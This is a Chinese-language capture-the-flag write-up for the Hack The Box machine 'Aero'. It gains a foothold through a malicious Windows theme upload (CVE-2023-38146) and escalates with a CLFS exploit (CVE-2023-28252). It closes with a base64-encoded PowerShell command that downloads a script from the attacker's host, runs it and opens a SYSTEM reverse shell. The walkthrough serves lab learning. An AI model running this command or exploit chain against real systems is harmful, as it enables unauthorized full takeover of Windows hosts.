HTB 靶机 Aero Write-up（Medium）

一、初步侦察与立足点获取

1.1 端口扫描与服务识别

首先进行端口扫描。扫描结果显示，目标主机仅开放了 80 端口，运行一个 Web 服务。

sudo nmap 10.10.11.237 -p- --min-rate=5000 -A

1.2 Web 应用分析与功能点识别

访问该 Web 服务。经过初步浏览，发现该网站提供了一个功能：允许用户上传 Windows 主题文件，并提示后续会有人审查和使用这些主题。

尝试进行目录爆破，但未发现有价值的路径或文件。

dirsearch -u http://10.10.11.237

为确保全面，也对 UDP 端口进行了探测，确认仅有 TCP 80 端口对外开放。因此，攻击的焦点自然落在了这个主题文件上传功能上。

1.3 漏洞研究：Windows 主题 RCE (CVE-2023-38146)

我们开始思考：如果上传一个恶意文件，它应该是什么类型？又该如何被服务器解析并利用呢？

针对 Windows 主题文件上传功能，经过一番搜索，找到了一个相关的远程代码执行漏洞：CVE-2023-38146。该漏洞影响 Windows 11 主题处理机制，允许通过特制的恶意主题文件执行任意命令。

1.4 漏洞利用与初始访问获取

根据公开的 PoC，构造一个恶意的 .theme 文件并进行上传。

同时，在本地设置好监听器。上传恶意主题文件后，稍等片刻便成功接收到目标主机的回连。获取到的用户权限为 sam.emerson。立即检查用户特权，未发现可直接利用的高权限。

二、权限提升

2.1 信息搜集：发现提权线索 (CVE-2023-28252)

获得初始访问权限后，首要任务是进行信息搜集。很快就在 sam.emerson 用户的 Documents 目录中，发现了一个 PDF 文档，其内容是关于 CVE-2023-28252 漏洞的修复提醒。

2.2 漏洞研究：Windows CLFS 本地提权 (CVE-2023-28252)

网上搜索发现这是一个 Windows 本地提权漏洞，这几乎算是明示系统存在该漏洞了吧。当然也不一定，可能是故意在这里误导我们。总之在 github 上找到了一个编译好的提权程序，先尝试一下。

2.3 漏洞利用与 SYSTEM 权限获取

将下载的提权程序 (例如 clfs_eop.exe) 上传到目标机器。首先，尝试执行一个简单的 whoami 命令来验证漏洞利用效果：

.\clfs_eop.exe whoami

命令成功以 SYSTEM 权限执行，确认了漏洞的存在和利用程序的有效性。

既然漏洞验证成功，接下来便利用此权限执行一个反弹 shell 的 PowerShell payload，以获取一个稳定的 SYSTEM 权限会话。Payload 经过 Base64 编码 (UTF-16LE)：

.\clfs_eop.exe 'powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADEANwAvAHIAZQB2AC4AcABzADEAJwApAA=='

本地监听器成功接收到回连，当前用户已是 NT AUTHORITY\SYSTEM，成功提权。